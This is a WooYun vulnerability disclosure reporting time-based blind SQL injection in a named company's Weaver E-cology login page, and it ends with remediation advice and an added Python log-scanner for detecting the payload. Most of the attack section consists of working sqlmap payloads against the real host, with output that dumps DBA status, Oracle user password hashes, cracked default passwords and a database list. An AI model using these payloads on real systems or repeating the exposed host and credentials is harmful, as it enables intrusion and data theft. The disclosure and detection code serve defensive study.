
Vulnerability summary

Defect ID: wooyun-2015-0114961

Title: SQL injection in a Jinmailang (今麦郎) system

Vendor: 今麦郎 (Jinmailang)

Author: TT向上

Submitted: 2015-05-19 17:08

Fix time: 2015-07-03 17:10

Public disclosure: 2015-07-03 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-19: Vendor being contacted, report awaiting vendor acknowledgement; details not public
2015-07-03: Vendor has actively ignored the report; details disclosed to the public

Summary:

SQL injection in the Jinmailang Food Group information portal system

Details:

SQL injection in the Jinmailang Food Group information portal system.

Proof of vulnerability:

Open the official site of Jinmailang Beverage Co., Ltd., http://www.jmlyp.com/, and follow the "information portal system" link in the top-right corner:
http://home.jmlyp.com/login/Login.jsp?logintype=1

[screenshot: hom1.png]


Probing the login page for injection redirects to the page that is actually injectable:
http://home.jmlyp.com/wui/theme/ecology7/page/login.jsp?templateId=101&logintype=1&gopage=&languageid=7&message=55

[screenshot: home.jmlyp-1.png]


The system is in fact Weaver E-cology (泛微E-COLOGY). The templateId parameter is injectable and can be handed straight to sqlmap.
It is a time-based blind injection against Oracle, so the run is slow.
sqlmap output: the application's database account has DBA privileges, and the banner is Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 (the trailing "64bi" is the banner exactly as Oracle 10g stores it: the v$version BANNER column is 64 characters wide, so "64bit Production" is cut off).

Parameter: templateId (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: templateId=101' AND 3194=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(76)||CHR(80)||CHR(114),5) AND 'FKyh'='FKyh&logintype=1&gopage=&languageid=7&message=55
---
web application technology: JSP
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi'
current user: 'COLOGY'
current schema (equivalent to database on Oracle): 'COLOGY'
hostname: 'cology.jmlyp.com'
current user is DBA: True


database management system users

database management system users [22]:
[*] ANONYMOUS
[*] COLOGY
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
database management system users password hashes:
[*] ANONYMOUS [1]:
password hash: anonymous
[*] COLOGY [1]:
password hash: 02B594CB6E4804F3
clear-text password: COLOGY
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
clear-text password: CHANGE_ON_INSTALL
[*] DBSNMP [1]:
password hash: FFF45BB2C0C327EC
clear-text password: ORACLE
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
clear-text password: DIP
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
clear-text password: DMSYS
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
clear-text password: EXFSYS
[*] MDDATA [1]:
password hash: DF02A496267DEE66
clear-text password: MDDATA
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
clear-text password: MDSYS
[*] MGMT_VIEW [1]:
password hash: 442167C25FAC883C
[*] OLAPSYS [1]:
password hash: 3FB8EF9DB538647C
clear-text password: MANAGER
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
clear-text password: ORDSYS
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
clear-text password: OUTLN
[*] SCOTT [1]:
password hash: F894844C34402B67
clear-text password: TIGER
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
password hash: 8A8F029737A9097A\x03
[*] SYSMAN [1]:
password hash: 2CA614501F09FCCC
clear-text password: ORACLE
[*] SYSTEM [1]:
password hash: 2D594E86F93B17A1
clear-text password: ORACLE
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
clear-text password: TSMSYS
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
clear-text password: WMSYS
[*] XDB [1]:
password hash: 88D8364765FCE6AF
clear-text password: CHANGE_ON_INSTALL


Database listing; I did not run anything further, it was too slow.

Parameter: templateId (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: templateId=101' AND 7017=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(65)||CHR(85)||CHR(106),5) AND 'ekFf'='ekFf&logintype=1&gopage=&languageid=7&message=55
---
web application technology: JSP
back-end DBMS: Oracle
available databases [16]:
[*] "COLOGY\X05\X11"
[*] "SYSMAN\X11"
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDYYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


Verification stops here; this should be enough to demonstrate the issue. (The stray control bytes in "COLOGY\X05\X11", "SYSMAN\X11" and after the SYS password hash, and the misspelt "ORDYYS", are inference errors typical of time-based blind extraction: a response that is delayed by the network rather than by the database, or that returns faster than expected, is classified wrongly and yields a wrong character. The user list above shows the correct names.)

Remediation:

Filter the input (templateId only ever carries an integer, so bind it as a numeric parameter of a prepared statement instead of concatenating it into the query), and audit the deployed Weaver E-cology version.
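As an added defensive example, not from the report or from any vendor tooling, the following Python script shows what the payload above looks like in a web server access log and how to flag it. The log lines are constructed for this example, in common log format with a trailing request-time field in seconds as nginx's $request_time would provide; the path, parameters and the first payload are taken from the report, the boolean-based variant on the third line is an assumed follow-up probe. Since templateId is a plain integer in legitimate traffic, the simplest check is also the strongest; the signature checks explain what the attacker was doing, decode the CHR() chain sqlmap used for the pipe name, and, when a request took at least as long as the DBMS_PIPE timeout, confirm that the injected delay actually ran.

```python
import re
import urllib.parse

# Constructed sample access log (not real server logs): common log format with a
# trailing request-time field in seconds. Line 2 carries the payload from the report,
# line 3 an assumed boolean-based variant, lines 1 and 4 legitimate traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/May/2015:17:01:02 +0800] "GET /wui/theme/ecology7/page/login.jsp'
    '?templateId=101&logintype=1&gopage=&languageid=7&message=55 HTTP/1.1" 200 5120 0.041',
    '10.0.0.9 - - [19/May/2015:17:01:07 +0800] "GET /wui/theme/ecology7/page/login.jsp'
    '?templateId=101%27%20AND%203194%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28109%29%7C%7CCHR%2876%29'
    '%7C%7CCHR%2880%29%7C%7CCHR%28114%29%2C5%29%20AND%20%27FKyh%27%3D%27FKyh'
    '&logintype=1&gopage=&languageid=7&message=55 HTTP/1.1" 200 5120 5.017',
    '10.0.0.9 - - [19/May/2015:17:01:13 +0800] "GET /wui/theme/ecology7/page/login.jsp'
    '?templateId=101%27%20AND%20%27a%27%3D%27a&logintype=1&gopage=&languageid=7&message=55'
    ' HTTP/1.1" 200 5120 0.039',
    '10.0.0.7 - - [19/May/2015:17:02:00 +0800] "GET /wui/theme/ecology7/page/login.jsp'
    '?templateId=102&logintype=1&gopage=&languageid=7&message=55 HTTP/1.1" 200 4988 0.045',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rtime>[\d.]+)$'
)
# Oracle delay primitive with its timeout argument, as used in the report's payload.
DELAY_RE = re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(.*?,\s*(\d+)\s*\)", re.I)
# sqlmap-style CHR()||CHR() string building, decoded below so the analyst sees the literal.
CHR_CHAIN_RE = re.compile(r"(?:CHR\(\d+\)\s*\|\|\s*)+CHR\(\d+\)", re.I)
# A closed string literal immediately followed by a boolean operator.
QUOTE_LOGIC_RE = re.compile(r"'\s*(?:AND|OR)\b", re.I)


def decode_chr_chain(chain):
    """Turn CHR(109)||CHR(76)||... into the string Oracle would build from it."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", chain, re.I))


def analyze(line):
    """Return a finding dict for a suspicious templateId request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urllib.parse.urlsplit(m.group("target")).query
    value = urllib.parse.parse_qs(query, keep_blank_values=True).get("templateId", [""])[0]
    reasons = []
    if not value.isdigit():  # legitimate values for this page are plain integers
        reasons.append("templateId is not an integer")
    if QUOTE_LOGIC_RE.search(value):
        reasons.append("string literal closed and followed by AND/OR")
    d = DELAY_RE.search(value)
    if d:
        reasons.append("DBMS_PIPE.RECEIVE_MESSAGE with %ss timeout" % d.group(1))
        if float(m.group("rtime")) >= float(d.group(1)):
            reasons.append("request time %ss: the delay fired, so the injection executed"
                           % m.group("rtime"))
    chains = [decode_chr_chain(c.group(0)) for c in CHR_CHAIN_RE.finditer(value)]
    if chains:
        reasons.append("CHR() obfuscated literal(s): " + ", ".join(repr(c) for c in chains))
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "templateId": value, "reasons": reasons}


def scan(lines):
    """Findings for every suspicious line, in log order."""
    return [f for f in map(analyze, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("%(time)s %(ip)s templateId=%(templateId)r" % finding)
        for reason in finding["reasons"]:
            print("    -", reason)
```

The integer check alone would have caught both probes; the request-time correlation is what turns "someone sent a payload" into "the payload executed on the database", which is the distinction an incident responder needs when deciding whether the DBA-level access shown in the report was actually reached.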

Copyright notice: when reposting, please credit TT向上@乌云 (WooYun)


Vulnerability response

Vendor reply:

Vendor could not be reached, or vendor actively declined to respond